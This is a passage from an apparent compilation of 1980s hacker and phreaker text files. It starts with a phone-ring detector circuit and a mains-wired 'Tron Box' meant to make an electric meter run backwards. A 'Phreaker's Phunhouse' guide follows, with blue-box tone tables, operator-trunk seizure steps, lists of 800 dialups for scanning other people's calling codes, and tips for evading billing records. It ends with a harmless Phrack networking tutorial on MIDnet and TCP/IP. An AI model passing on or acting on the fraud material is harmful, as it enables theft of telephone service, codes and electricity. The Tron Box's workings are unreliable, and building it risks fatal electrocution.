rings. Just connect the 8 ohm
speaker output to the inputs on the rust box,
and control the pot to tune it to light the light (which
can be replaced by
a relay for external controlling) when the phone rings.
______________
|
| ^
NC --|-- 5 4 --|-----/\/\/------->G
| | / R2
G<----)|----|-- 6 3 --|-- NC
| C3 | U1 |
-------|-- 7 2
--|---------- --- -- - > TO RINGER
| |
----|-- 8 1 --|--
|
|______________| |
| ---/\/\/----|(----- L1
| R1 C1
------------------------------------------ L2
a. Main ringer TTL
circuit
_____________________________________________________________________________________________
_
FROM PIN 2 < - -- --- ----------| |_| |------------->G
P1
b. Peizoelectric transducer
_____________________________________________________________________________________________
__ /|
FROM PIN 2 < - -- --- ---------|(---------. .-------| |/ |
>||< |S1| |
>||< --| | |
>||< | |__|\ |
G<---------.>||<.--- \|
T1
c. Elctro magnetic transducer
Parts List
* U1 - Texas Instruments TCM1506
* T1 - 4000:8
ohm audio transfomer
* S1 - 8 ohm speaker
* R1 - 2.2k resistor
* R2
- External variable resistor; adjusts timing frequency
* C1 - .47uF
capacitor
* C2 - .1uF capacitor
* C3 - 10uF capacitor
* L1 - Tip
* L2 - Ring
L1 and L2 are the phone line.
Shift Rate:
This is the formula for determining the shift rate:
1 1
SR =
--------------------- = ------------ = 6.25 Hz
(DSR(1/f1)+DSR(1/f2)) 128 128
---- + ----
1714 1500
DSR = Shift Devider Rate ratio = 128
f1 = High Output Frequency = 1714
f2 = Low Output Frequency = 1500
Index
The Tron Box Written by The GREAT Captain Crunch!!
Courtesy of Exodus
------------------R-----F----
I I I I
I I I I-
(C) (C) (C)
I I I I-
I I I I
-----------------------------
(C)=CAPACITOR
F =FUSE
R
=RESISTOR
I,- ARE WIRE
PARTS LIST:
* (3) ELECTROLYTIC
CAPACITORS RATED AT 50V(LOWEST) .47UF
* (1) 20-30OHM 1/2 WATT RESISTOR
*
(1) 120VOLT FUSE (AMP RATING BEST TO USE AT LEAST HALF OF TOTAL HOUSE CURRENT OR
EVEN LESS IT
KEEPS YOU FROM BLOWING YOUR BREAKER JUST IN CASE...)
* (1)
POWER CORD (CUT UP AN EXTENSTION CORD. NEED PLUG PART AND WIRE)
* (1)
ELECTRICALLY INSULATED BOX
REST OF SIF YOUR DONT FILL COMFORTABLE ABOUT
ELECTRICITY THEN DONT PLAY WITH THIS THERE IS VOLTAGE
PRESENT THAT WILL
***KILL*** YOU......................
THE THING WORKS WHEN THE LOAD IN
YOUR HOUSE IS LOW LIKE AT NIGHT TIME. IT WILL PUT A REVERSE PHASE
SIGNAL ON
THE LINE AND CANCEL OUT THE OTHER PHASE AND PUT A REVERSE PHASE RUNNING
EVERYTHING IN THE
HOUSE. WELL IF YOU HAVE EVER SWITCHED THE POWER LEADS ON A
D.C. (BATTERY POWERED) MOTOR YOU WILL SEE
THAT IT RUNS BACKWARDS WELL YOUR
ELECTRIC METER SORT OF WORKS THIS WAY...SO REVERSE PHASE MAKES THE
METER
SLOW DOWN AND IF YOUR LUCKY IT WILL GO BACKWARDS. ANYWAY IT MEANS A CHEAPER
ELECTRIC BILL.
Index
Phreaker's Phunhouse Courtesy of Exodus
The long awaited prequil to Phreaker's Guide has finally arrived.
Conceived from the boredom and
loneliness that could only be derived from:
The Traveler! But now, he has returned in full strength
(after a small
vacation) and is here to 'World Premiere' the new files everywhere. Stay cool.
This is
the prequil to the first one, so just relax. This is not made to be
an exclusive ultra elite file, so
kinda calm down and watch in the
background if you are too cool for it.
Phreak Dictionary
Here
you will find some of the basic but necessary terms that should be known by any
phreak who wants
to be respected at all.
Phreak
1. The action of
using mischevious and mostly illegal ways in order to not pay for some sort of
tele-
communications bill, order, transfer, or other service. It often
involves usage of highly illegal
boxes and machines in order to defeat the
security that is set up to avoid this sort of happening.
[fr'eaking]. v.
2. A person who uses the above methods of destruction and chaos in order to
make a better life for
all. A true phreaker will not not go against his
fellows or narc on people who have ragged on him
or do anything termed to be
dishonorable to phreaks. [fr'eek]. n.
3. A certain code or dialup useful in
the action of being a phreak. (Example: "I hacked a new metro
phreak last
night.")
Switching System:
There are 3 main switching systems
currently employed in the US, and a few other systems will be
mentioned as
background.
1. SxS: This system was invented in 1918 and was employed in
over half of the country until 1978. It
is a very basic system that is a
general waste of energy and hard work on the linesman. A good way
to
identify this is that it requires a coin in the phone booth before it will give
you a dial
tone, or that no call waiting, call forwarding, or any other such
service is available. Stands
for: Step by Step
2. XB: This switching
system was first employed in 1978 in order to take care of most of the faults
of SxS switching. Not only is it more efficient, but it also can support
different services in
various forms. XB1 is Crossbar Version 1. That is very
limited and is hard to distinguish from SxS
except by direct view of the
wiring involved. Next up was XB4, Crossbar Version 4. With this
system, some
of the basic things like DTMF that were not available with SxS can be
accomplished.
For the final stroke of XB, XB5 was created. This is a service
that can allow DTMF plus most 800
type services (which were not always
available.) Stands for: Crossbar.
3. ESS: A nightmare in telecom. In vivid
color, ESS is a pretty bad thing to have to stand up to. It
is quite simple
to identify. Dialing 911 for emergencies, and ANI [see ANI below] are the most
common facets of the dread system. ESS has the capability to list in a
person's caller log what
number was called, how long the call took, and even
the status of the conversation (modem or
otherwise.) Since ESS has been
employed, which has been very recently, it has gone through many
kinds of
revisions. The latest system to date is ESS 11a, that is employed in Washington
D.C. for
security reasons. ESS is truly trouble for any phreak, because it
is 'smarter' than the other
systems. For instance, if on your caller log
they saw 50 calls to 1-800-421-9438, they would be
able to do a CN/A [see
Loopholes below] on your number and determine whether you are subscribed to
that service or not. This makes most calls a hazard, because although 800
numbers appear to be
free, they are recorded on your caller log and then
right before you receive your bill it deletes
the billings for them. But
before that the are open to inspection, which is one reason why
extended use
of any code is dangerous under ESS. Some of the boxes [see Boxing below] are
unable
to function in ESS. It is generally a menace to the true phreak.
Stands For: Electronic Switching
System. Because they could appear on a
filter somewhere or maybe it is just nice to know them
anyways.
+ SSS:
Strowger Switching System. First non-operator system available.
+ WES:
Western Electronics Switching. Used about 40 years ago with some minor places
out west.
Boxing:
* The use of personally designed boxes that emit
or cancel electronical impulses that allow simpler
acting while phreaking.
Through the use of separate boxes, you can accomplish most feats possible
with or without the control of an operator.
* Some boxes and their
functions are listed below. Ones marked with '*' indicate that they are not
operatable in ESS.
+ *Black Box: Makes it seem to the phone company that
the phone was never picked up.
+ Blue Box : Emits a 2600hz tone that allows
you to do such things as stack a trunk line, kick
the operator off line, and
others.
+ Red Box : Simulates the noise of a quarter, nickel, or dime being
dropped into a payphone.
+ Cheese Box : Turns your home phone into a pay
phone to throw off traces (a red box is usually
needed in order to call
out.)
+ *Clear Box : Gives you a dial tone on some of the old SxS payphones
without putting in a
coin.
+ Beige Box : A simpler produced linesman's
handset that allows you to tap into phone lines and
extract by
eavesdropping, or crossing wires, etc.
+ Purple Box : Makes all calls made
out from your house seem to be local calls.
ANI [ANI]
Automatic
Number Identification. A service available on ESS that allows a phone service
[see Dialups
below] to record the number that any certain code was dialed
from along with the number that was
called and print both of these on the
customer bill. 950 dialups [see Dialups below] are all designed
just to use
ANI. Some of the services do not have the proper equipment to read the ANI
impulses yet,
but it is impossible to see which is which without being
busted or not busted first.
Dialups [dy'l'ups]
* Any local or 800
extended outlet that allows instant access to any service such as MCI, Sprint,
or
AT&T that from there can be used by handpicking or using a program to
reveal other peoples codes
which can then be used moderately until they find
out about it and you must switch to another code
(preferrably before they
find out about it.)
* Dialups are extremely common on both senses. Some
dialups reveal the company that operates them as
soon as you hear the tone.
Others are much harder and some you may never be able to identify. A
small
list of dialups:
1-800-421-9438 (5 digit codes)
1-800-547-6754 (6 digit
codes)
1-800-345-0008 (6 digit codes)
1-800-734-3478 (6 digit codes)
1-800-222-2255 (5 digit codes)
Codes:
Codes are very easily
accessed procedures when you call a dialup. They will give you some sort of
tone. If the tone does not end in 3 seconds, then punch in the code and
immediately following the
code, the number you are dialing but strike the
'1' in the beginning out first. If the tone does end,
then punch in the code
when the tone ends. Then, it will give you another tone. Punch in the number
you are dialing, or a '9'. If you punch in a '9' and the tone stops, then
you messed up a little. If
you punch in a tone and the tone continues, then
simply dial then number you are calling without the
'1'.
All codes
are not universal. The only type that I know of that is truly universal is
Metrophone.
Almost every major city has a local Metro dialup (for
Philadelphia, (215)351-0100/0126) and since the
codes are universal, almost
every phreak has used them once or twice. They do not employ ANI in any
outlets that I know of, so feel free to check through your books and call
555-1212 or, as a more
devious manor, subscribe yourself. Then, never use
your own code. That way, if they check up on you
due to your caller log,
they can usually find out that you are subscribed. Not only that but you could
set a phreak hacker around that area and just let it hack away, since they
usually group them, and, as
a bonus, you will have their local dialup.
950's.
They seem like a perfectly cool phreakers dream. They are
free from your house, from payphones, from
everywhere, and they host all of
the major long distance companies (950)1044 , 950)1077 ,
950-1088 , 950-1033 .) Well, they aren't. They were
designed for ANI. That is
the point, end of discussion.
A phreak
dictionary. If you remember all of the things contained on that fileup there,
you may have a
better chance of doing whatever it is you do. This next
section is maybe a little more interesting...
Blue Box Plans:
These are some blue box plans, but first, be warned, there have been
2600hz tone detectors out on
operator trunk lines since XB4. The idea behind
it is to use a 2600hz tone for a few very naughty
functions that can really
make your day lighten up. But first, here are the plans, or the heart of the
file:
700 : 1 : 2 : 4 : 7 : 11 :
900 : + : 3 : 5 : 8 : 12 :
1100
: + : + : 6 : 9 : KP :
1300 : + : + : + : 10 : KP2 :
1500 : + : + : + :
+ : ST :
: 700 : 900 :1100 :1300 :1500 :
Stop! Before you diehard
users start piecing those little tone tidbits together, there is a simpler
method. If you have an Apple-Cat with a program like Cat's Meow IV, then you
can generate the
necessary tones, the 2600hz tone, the KP tone, the KP2
tone, and the ST tone through the dial section.
So if you have that I will
assume you can boot it up and it works, and I'll do you the favor of
telling
you and the other users what to do with the blue box now that you have somehow
constructed it.
The connection to an operator is one of the most well known
and used ways of having fun with your blue
box. You simply dial a TSPS
(Traffic Service Positioning Station, or the operator you get when you
dial
'0') and blow a 2600hz tone through the line. Watch out! Do not dial this
direct! After you have
done that, it is quite simple to have fun with it.
Blow a KP tone to start a call, a ST tone to stop
it, and a 2600hz tone to
hang up. Once you have connected to it, here are some fun numbers to call
with it:
0-700-456-1000 Teleconference (free, because you are the
operator!)
(Area code)-101 Toll Switching
(Area code)-121 Local Operator
(hehe)
(Area code)-131 Information
(Area code)-141 Rate & Route
(Area code)-181 Coin Refund Operator
(Area code)-11511 Conference
operator (when you dial 800-544-6363)
Well, those were the tone matrix
controllers for the blue box and some other helpful stuff to help you
to
start out with. But those are only the functions with the operator. There are
other k-fun things
you can do with it.
More advanced Blue Box Stuff:
Oops. Small mistake up there. I forgot tone lengths. Um, you blow a tone
pair out for up to 1/10 of a
second with another 1/10 second for silence
between the digits. KP tones should be sent for 2/10 of a
second. One way to
confuse the 2600hz traps is to send pink noise over the channel (for all of you
that have decent BSR equalizers, there is major pink noise in there.)
Using the operator functions is the use of the 'inward' trunk line.
Thatis working it from the inside.
From the 'outward' trunk, you can do such
things as make emergency breakthrough calls, tap into lines,
busy all of the
lines in any trunk (called 'stacking'), enable or disable the TSPS's, and for
some 4a
systems you can even re-route calls to anywhere.
All right.
The one thing that every complete phreak guide should be without is blue box
plans, since
they were once a vital part of phreaking. Another thing that
every complete file needs is a complete
listing of all of the 800 numbers
around so you can have some more Fun
800 Dialup Listings
1-800-345-0008 (6) 1-800-547-6754 (6)
1-800-245-4890 (4)
1-800-327-9136 (4)
1-800-526-5305 (8) 1-800-858-9000 (3)
1-800-437-9895
(7) 1-800-245-7508 (5)
1-800-343-1844 (4) 1-800-322-1415 (6)
1-800-437-3478 (6) 1-800-325-7222 (6)
All right, set Cat Hacker 1.0
on those numbers and have a fuck of a day. That is enough with 800
codes, by
the time this gets around to you I dunno what state those codes will be in, but
try them all
out anyways and see what you get. On some 800 services now,
they have an operator who will answer and
ask you for your code, and then
your name. Some will switch back and forth between voice and tone
verification, you can never be quite sure which you will be upagainst.
Armed with this knowledge you should be having a pretty good time
phreaking now. But class isn't over
yet, there are still a couple important
rules that you should know. If you hear continual clicking on
the line, then
you should assume that an operator is messing with something, maybe even
listening in
on you. It is a good idea to call someone back when the phone
starts doing that. If you were using a
code, use a different code and/or
service to call him back.
A good way to detect if a code has gone bad or
not is to listen when the number has been dialed. If
the code is bad you
will probably hear the phone ringing more clearly and more quickly than if you
were using a different code. If someone answers voice to it then you can
immediately assume that it is
an operative for whatever company you are
using. The famed '311311' code for Metro is one of those.
You would have to
be quite stupid to actually respond, because whoever you ask for the operator
will
always say 'He's not in right now, can I have him call you back?' and
then they will ask for your name
and phone number. Some of the more
sophisticated companies will actually give you a carrier on a line
that is
supposed to give you a carrier and then just have garbage flow across the screen
like it would
with a bad connection. That is a feeble effort to make you
think that the code is still working and
maybe get you to dial someone's
voice, a good test for the carrier trick is to dial anumber that will
give
you a carrier that you have never dialed with that code before, that will allow
you to determine
whether the code is good or not. For our next section, a
lighter look at some of the things that a
phreak should not be without. A
vocabulary. A few months ago, it was a quite strange world for the
modem
people out there. But now, a phreaker's vocabulary is essential if you wanna
make a good
impression on people when you post what you know about certain
subjects.
Vocabulary
* Do not misspell except certain
exceptions:
phone -> fone
freak -> phreak
* Never substitute
'z's for 's's. (i.e. codez -> codes)
* never leave many characters after
a post (i.e. Hey Dudes!#!@#@!#!@)
* NEVER use the 'k' prefix (k-kool, k-rad,
k-whatever)
* Do not abbreviate. (I got lotsa wares w/ docs)
* Never
substitute '0' for 'o' (r0dent, l0zer).
* Forget about ye old upper case, it
looks ruggyish.
All right, that was to relieve the tension of what is
being drilled into your minds at the moment.
Now, however, back to the
teaching course. Here are somethings you should know about phones and
billings for phones, etc.
LATA: Local Access Transference Area.
Some people who live in large cities or areas may be plagued by this
problem. For instance, let's say
you live in the 215 area code under the 542
prefix (Ambler, Fort Washington). If you went to dial in a
basic Metro code
from that area, for instance, 351-0100, that might not be counted under
unlimited
local calling because it is out of your LATA. For some LATA's, you
have to dial a '1' without the area
code before you can dial the phone
number. That could prove a hassle for us all if you didn't realize
you would
be billed for that sort of call. In that way, sometimes, it is better to be safe
than sorry
and phreak.
The Caller Log:
In ESS regions, for
every household around, the phone company has something on you called a Caller
Log. This shows every single number that you dialed, and things can be
arranged so it showed every
number that was calling to you. That's one main
disadvantage of ESS, it is mostly computerized so a
number scan could be
done like that quite easily. Using a dialup is an easy way to screw that, and is
something worth remembering. Anyways, with the caller log, they check up and
see what you dialed.
Hmm... you dialed 15 different 800 numbers that month.
Soon they find that you are subscribed to none
of those companies. But that
is not the only thing. Most people would imagine "But wait! 800 numbers
don't show up on my phone bill!". To those people, it is a nice thought, but
800 numbers are picked up
on the caller log until right before they are sent
off to you. So they can check right up on you
before they send it away and
can note the fact that you fucked up slightly and called one too many 800
lines.
Right now, after all of that, you should have a pretty good
idea of how to grow up as a good phreak.
Follow these guidelines, don't show
off, and don't take unnecessary risks when phreaking or hacking.
(*Greets to Pee Wee for this file taken from his 'Hell Disk' #1*)
-----------Exodus----------
Index
==Phrack Inc.== Volume Three, Issue 27, File 3 of 12
################################################################
##
##
## Introduction to MIDNET ##
## ~~~~~~~~~~~~~~~~~~~~~~ ##
##
Chapter Seven Of The Future Transcendent Saga ##
## ##
## A More Indepth
Look Into NSFnet ##
## National Science Foundation Network ##
## ##
## Presented by Knight Lightning ##
## June 16, 1989 ##
## ##
################################################################
Prologue
If you are not already familiar with NSFnet, I would
suggest that you read:
"Frontiers" (Phrack Inc., Volume Two, Issue 24,
File 4 of 13), and definitely;
"NSFnet: National Science Foundation Network"
(Phrack Inc., Volume Three, Issue 26, File 4 of 11).
Table Of Contents
* Introduction
* The DOD Protocol Suite
* Names and Addresses In
A Network
* Telnet (*NOT* Telenet)
* File Transfer
* Mail
Introduction
MIDNET is a regional computer network that is part
of the NSFnet, the National Science Foundation
Network. Currently, eleven
mid-United States universities are connected to each other and to the
NSFnet
via MIDnet:
* UA - University of Arkansas at Fayetteville
* ISU - Iowa
State University at Ames
* UI - University of Iowa at Iowa City
* KSU -
Kansas State University at Manhattan
* KU - University of Kansas at Lawrence
* UMC - University of Missouri at Columbia
* WU - Washington University
at St. Louis, Missouri
* UNL - University of Nebraska at Lincoln
* OSU -
Oklahoma State University at Stillwater
* UT - University of Tulsa
(Oklahoma)
* OU - University of Oklahoma at Norman
Researchers at
any of these universities that have funded grants can access the six
supercomputer
centers funded by the NSF:
John Von Neuman
Supercomputer Center
National Center for Atmospheric Research
Cornell
National Supercomputer Facility
National Center for Supercomputing
Applications
Pittsburgh Supercomputing Center
San Diego Supercomputing
Center
In addition, researchers and scientists can communicate with each
other over a vast world-wide
computer network that includes the NSFnet,
ARPAnet, CSnet, BITnet, and others that you have read about
in The Future
Transcendent Saga. Please refer to "Frontiers" (Phrack Inc., Volume Two, Issue
24, File
4 of 13) for more details.
MIDnet is just one of several
regional computer networks that comprise the NSFnet system. Although all
of
these regional computer networks work the same, MIDnet is the only one that I
have direct access to
and so this file is written from a MIDnet point of
view. For people who have access to the other
regional networks of NSFnet,
the only real differences depicted in this file that would not apply to
the
other regional networks are the universities that are served by MIDnet as
opposed to:
NYSERnet in New York State
SURAnet in the southeastern
United States
SEQSUInet in Texas
BARRnet in the San Francisco area
MERIT in Michigan
(There are others that are currently being
constructed.)
These regional networks all hook into the NSFnet backbone,
which is a network that connects the six
supercomputer centers. For example,
a person at Kansas State University can connect with a
supercomputer via
MIDnet and the NSFnet backbone. That researcher can also send mail to colleagues
at
the University of Delaware by using MIDnet, NSFnet and SURAnet. Each
university has its own local
computer network which connects on-campus
computers as well as providing a means to connecting to a
regional network.
Some universities are already connected to older networks such as CSnet,
the ARPAnet and BITnet. In
principal, any campus connected to any of these
networks can access anyone else in any other network
since there are
gateways between the networks.
Gateways are specialized computers that
forward network traffic, thereby connecting networks. In
practice, these
wide-area networks use different networking technology which make it impossible
to
provide full functionality across the gateways. However, mail is almost
universally supported across
all gateways, so that a person at a BITnet site
can send mail messages to a colleague at an ARPAnet
site (or anywhere else
for that matter). You should already be somewhat familiar with this, but if not
refer to;
"Limbo To Infinity" (Phrack Inc., Volume Two, Issue 24,
File 3 of 13) and
"Internet Domains" (Phrack Inc., Volume Three, Issue 26,
File 8 of 11)
Computer networks rely on hardware and software that allow
computers to communicate. The language that
enables network communication is
called a protocol. There are many different protocols in use today.
MIDnet
uses the TCP/IP protocols, also known as the DOD (Department of Defense)
Protocol Suite.
Other networks that use TCP/IP include ARPAnet, CSnet
and the NSFnet. In fact, all the regional
networks that are linked to the
NSFnet backbone are required to use TCP/IP. At the local campus level,
TCP/IP is often used, although other protocols such as IBM's SNA and DEC's
DECnet are common. In order
to communicate with a computer via MIDnet and
the NSFnet, a computer at a campus must use TCP/IP
directly or use a gateway
that will translate its protocols into TCP/IP.
The Internet is a
world-wide computer network that is the conglomeration of most of the large wide
area networks, including ARPAnet, CSnet, NSFnet, and the regionals, such as
MIDnet. To a lesser
degree, other networks such as BITnet that can send mail
to hosts on these networks are included as
part of the Internet. This huge
network of networks, the Internet, as you have by now read all about
in the
pages of Phrack Inc., is a rapidly growing and very complex entity that allows
sophisticated
communication between scientists, students, government
officials and others. Being a part of this
community is both exciting and
challenging.
This chapter of the Future Transcendent Saga gives a
general description of the protocols and software
used in MIDnet and the
NSFNet. A discussion of several of the more commonly used networking tools is
also included to enable you to make practical use of the network as soon as
possible.
The DOD Protocol Suite
The DOD Protocol Suite includes
many different protocols. Each protocol is a specification of how
communication is to occur between computers. Computer hardware and software
vendors use the protocol
to create programs and sometimes specialized
hardware in order to implement the network function
intended by the
protocol. Different implementations of the same protocol exist for the varied
hardware
and operating systems found in a network.
The three most
commonly used network functions are:
Mail -- Sending and receiving
messages
File Transfer -- Sending and receiving files
Remote Login --
Logging into a distant computer
Of these, mail is probably the most
commonly used.
In the TCP/IP world, there are three different protocols
that realize these functions:
SMTP -- (Simple Mail Transfer Protocol)
Mail
FTP -- (File Transfer Protocol) sending and receiving files
Telnet
-- Remote login
How to use these protocols is discussed in the next
section. At first glance, it is not obvious why
these three functions are
the most common. After all, mail and file transfer seem to be the same
thing. However, mail messages are not identical to files, since they are
usually comprised of only
ASCII characters and are sequential in structure.
Files may contain binary data and have complicated,
non-sequential
structures. Also, mail messages can usually tolerate some errors in transmission
whereas files should not contain any errors. Finally, file transfers usually
occur in a secure setting
(i.e. The users who are transferring files know
each other's names and passwords and are permitted to
transfer the file,
whereas mail can be sent to anybody as long as their name is known).
While mail and transfer accomplish the transfer of raw information from
one computer to another,
Telnet allows a distant user to process that
information, either by logging in to a remote computer or
by linking to
another terminal. Telnet is most often used to remotely log in to a distant
computer,
but it is actually a general-purpose communications protocol. I
have found it incredibly useful over
the last year. In some ways, it could
be used for a great deal of access because you can directly
connect to
another computer anywhere that has TCP/IP capabilities, however please note that
Telnet is
*NOT* Telenet.
There are other functions that some
networks provide, including the following:
* Name to address translation for
networks, computers and people
* The current time
* Quote of the day or
fortune
* Printing on a remote printer, or use of any other remote
peripheral
* Submission of batch jobs for non-interactive execution
*
Dialogues and conferencing between multiple users
* Remote procedure call
(i.e. Distributing program execution over several remote computers)
*
Transmission of voice or video information
Some of these functions are
still in the experimental stages and require faster computer networks than
currently exist. In the future, new functions will undoubtedly be invented
and existing ones improved.
The DOD Protocol Suite is a layered network
architecture, which means that network functions are
performed by different
programs that work independently and in harmony with each other. Not only are
there different programs but there are different protocols. The protocols
SMTP, FTP and Telnet are
described above. Protocols have been defined for
getting the current time, the quote of the day, and
for translating names.
These protocols are called applications protocols because users directly
interact with the programs that implement these protocols.
The
Transmission Control Protocol, TCP, is used by many of the application
protocols. Users almost
never interact with TCP directly. TCP establishes a
reliable end-to-end connection between two
processes on remote computers.
Data is sent through a network in small chunks called packets to
improve
reliability and performance. TCP ensures that packets arrive in order and
without errors. If a
packet does have errors, TCP requests that the packet
be retransmitted.
In turn, TCP calls upon IP, Internet Protocol, to move
the data from one network to another. IP is
still not the lowest layer of
the architecture, since there is usually a "data link layer protocol"
below
it. This can be any of a number of different protocols, two very common ones
being X.25 and
Ethernet.
FTP, Telnet and SMTP are called
"application protocols", since they are directly used by applications
programs that enable users to make use of the network. Network applications
are the actual programs
that implement these protocols and provide an
interface between the user and the computer. An
implementation of a network
protocol is a program or package of programs that provides the desired
network function such as file transfer. Since computers differ from vendor
to vendor (e.g. IBM, DEC,
CDC), each computer must have its own
implementation of these protocols. However, the protocols are
standardized
so that computers can interoperate over the network (i.e. Can understand and
process each
other's data). For example, a TCP packet generated by an IBM
computer can be read and processed by a
DEC computer.
In many
instances, network applications programs use the name of the protocol. For
example, the
program that transfers files may be called "FTP" and the
program that allows remote logins may be
called "Telnet." Sometimes these
protocols are incorporated into larger packages, as is common with
SMTP.
Many computers have mail programs that allow users on the same computer to send
mail to each
other. SMTP functions are often added to these mail programs so
that users can also send and receive
mail through a network. In such cases,
there is no separate program called SMTP that the user can
access, since the
mail program provides the user interface to this network function.
Specific implementation of network protocols, such as FTP, are tailored
to the computer hardware and
operating system on which they are used.
Therefore, the exact user interface varies from one
implementation to
another. For example, the FTP protocol specifies a set of FTP commands which
each
FTP implementation must understand and process. However, these are
usually placed at a low level,
often invisible to the user, who is given a
higher set of commands to use.
These higher-level commands are not
standardized so they may vary from one implementation of FTP to
another. For
some operating systems, not all of these commands make equal sense, such as
"Change
Directory," or may have different meanings. Therefore the specific
user interface that the user sees
will probably differ.
This file
describes a generic implementation of the standard TCP/IP application protocols.
Users must
consult local documentation for specifics at their sites.
Names and Addresses In A Network
In DOD Protocol Suite, each
network is given a unique identifying number. This number is assigned by a
central authority, namely the Network Information Center run by SRI,
abbreviated as SRI-NIC, in order
to prevent more than one network from
having the same network number. For example, the ARPAnet has
network number
10 while MIDnet has a longer number, namely 128.242.
Each host in a
network has a unique identification so other hosts can specify them
unambiguously. Host
numbers are usually assigned by the organization that
manages the network, rather than one central
authority. Host numbers do not
need to be unique throughout the whole Internet but two hosts on the
same
network need to have unique host numbers.
The combination of the network
number and the host number is called the IP address of the host and is
specified as a 32-bit binary number. All IP addresses in the Internet are
expressible as 32-bit
numbers, although they are often written in dotted
decimal notation. Dotted decimal notation breaks
the 32-bit number into four
eight-bit parts or octets and each octet is specified as a decimal number.
For example, 00000001 is the binary octet that specifies the decimal number
1, while 11000000
specifies 192. Dotted decimal notation makes IP addresses
much easier to read and remember.
Computers in the Internet are also
identified by hostnames, which are strings of characters, such as
"phrackvax." However, IP packets must specify the 32-bit IP address instead
of the hostname so some
way to translating hostnames to IP addresses must
exist.
One way is to have a table of hostnames and their corresponding
IP addresses, called a hosttable.
Nearly every TCP/IP implementation has
such a hosttable, although the weaknesses of this method are
forcing a shift
to a new scheme called the domain name system. In UNIX systems, the hosttable is
often
called "/etc/hosts." You can usually read this file and find out what
the IP addresses of various
hosts are. Other systems may call this file by a
different name and make it unavailable for public
viewing.
Users of
computers are generally given accounts to which all charges for computer use are
billed. Even
if computer time is free at an installation, accounts are used
to distinguish between the users and
enforce file protections. The generic
term "username" will be used in this file to refer to the name
by which the
computer account is accessed.
In the early days of the ARPAnet which was
the first network to use the TCP/IP protocols, computer
users were
identified by their username, followed by a commercial "at" sign (@), followed
by the
hostname on which the account existed. Networks were not given names,
per se, although the IP address
specified a network number.
For
example, "knight@phrackvax" referred to user "knight" on host "phrackvax." This
did not specify
which network "phrackvax" was on, although that information
could be obtained by examining the
hosttable and the IP address for
"phrackvax." (However, "phrackvax" is a ficticious hostname used for
this
presentation.)
As time went on, every computer on the network had to
have an entry in its hosttable for every other
computer on the network. When
several networks linked together to form the Internet, the problem of
maintaining this central hosttable got out of hand. Therefore, the domain
name scheme was introduced
to split up the hosttable and make it smaller and
easier to maintain.
In the new domain name scheme, users are still
identified by their usernames, but hosts are now
identified by their
hostname and any and all domains of which they are a part. For example, the
following address, "KNIGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT"
on host "UMCVMB". However,
host "UMCVMB" is a part of the domain "MISSOURI"
" which is in turn part of the domain "EDU". There
are other domains in
"EDU", although only one is named "MISSOURI". In the domain "MISSOURI", there is
only one host named "UMCVMB".
However, other domains in "EDU" could
theoretically have hosts named "UMCVMB" (although I would say
that this is
rather unlikely in this example). Thus the combination of hostname and all its
domains
makes it unique. The method of translating such names into IP
addresses is no longer as
straightforward as looking up the hostname in a
table. Several protocols and specialized network
software called nameservers
and resolvers implement the domain name scheme.
Not all TCP/IP
implementations support domain names because it is rather new. In those cases,
the
local hosttable provides the only way to translate hostnames to IP
addresses. The system manager of
that computer will have to put an entry
into the hosttable for every host that users may want to
connect to. In some
cases, users may consult the nameserver themselves to find out the IP address
for
a given hostname and then use that IP address directly instead of a
hostname.
I have selected a few network hosts to demonstrate how a host
system can be specified by both the
hostname and host numerical address.
Some of the nodes I have selected are also nodes on BITnet,
perhaps even
some of the others that I do not make a note of due a lack of omniscent
awareness about
each and every single host system in the world :-)
Numerical Hostname Location BITnet
--------- -------- -------- ------
18.72.0.39 ATHENA.MIT.EDU (Mass. Institute of Technology) ?
26.0.0.73
SRI-NIC.ARPA (DDN Network Information Center) -
36.21.0.13
MACBETH.STANFORD.EDU (Stanford University) ?
36.21.0.60 PORTIA.STANFORD.EDU
(Stanford University) ?
128.2.11.131 ANDREW.CMU.EDU (Carnegie Mellon
University) ANDREW
128.3.254.13 LBL.GOV (Lawrence Berkeley Labrotories) LBL
128.6.4.7 RUTGERS.RUTGERS.EDU (Rutgers University) ?
128.59.99.1
CUCARD.MED.COLUMBIA.EDU (Columbia University) ?
128.102.18.3
AMES.ARC.NASA.GOV (Ames Research Center [NASA]) -
128.103.1.1 HARVARD.EDU
(Harvard University) HARVARD
128.111.24.40 HUB.UCSB.EDU (Univ. Of
Calif-Santa Barbara) ?
128.115.14.1 LLL-WINKEN.LLNL.GOV (Lawrence Livermore
Labratories) -
128.143.2.7 UVAARPA.VIRGINIA.EDU (University of Virginia) ?
128.148.128.40 BROWNVM.BROWN.EDU (Brown University) BROWN
128.163.1.5
UKCC.UKY.EDU (University of Kentucky) UKCC
128.183.10.4 NSSDCA.GSFC.NASA.GOV
(Goddard Space Flight Center [NASA])-
128.186.4.18 RAI.CC.FSU.EDU (Florida
State University) FSU
128.206.1.1 UMCVMB.MISSOURI.EDU (Univ. of
Missouri-Columbia) UMCVMB
128.208.1.15 MAX.ACS.WASHINGTON.EDU (University of
Washington) MAX
128.228.1.2 CUNYVM.CUNY.EDU (City University of New York)
CUNYVM
129.10.1.6 NUHUB.ACS.NORTHEASTERN.EDU (Northeastern University) NUHUB
131.151.1.4 UMRVMA.UMR.EDU (University of Missouri-Rolla) UMRVMA
192.9.9.1 SUN.COM (Sun Microsystems, Inc.) -
192.33.18.30 VM1.NODAK.EDU
(North Dakota State Univ.) NDSUVM1
192.33.18.50 PLAINS.NODAK.EDU (North
Dakota State Univ.) NDSUVAX
Please Note:
Not every system on
BITnet has an IP address. Likewise, not every system that has an IP address is
on
BITnet. Also, while some locations like Stanford University may have
nodes on BITnet and have hosts on
the IP as well, this does not neccessarily
imply that the systems on BITnet and on IP (the EDU domain
in this case) are
the same systems.
Attempts to gain unauthorized access to systems on the
Internet are not tolerated and is legally a
federal offense. At some hosts,
they take this very seriously, especially the government hosts such as
NASA's Goddard Space Flight Center, where they do not mind telling you so at
the main prompt when you
connect to their system.
However, some
nodes are public access to an extent. The DDN Network Information Center can be
used by
anyone. The server and database there have proven to be an
invaluable source of information when
locating people, systems, and other
information that is related to the Internet.
Telnet
Remote login
refers to logging in to a remote computer from a terminal connected to a local
computer.
Telnet is the standard protocol in the DOD Protocol Suite for
accomplishing this. The "rlogin"
program, provided with Berkeley UNIX
systems and some other systems, also enables remote login.
For purposes
of discussion, the "local computer" is the computer to which your terminal is
directly
connected while the "remote computer" is the computer on the
network to which you are communicating
and to which your terminal is *NOT*
directly connected.
Since some computers use a different method of
attaching terminals to computers, a better definition
would be the
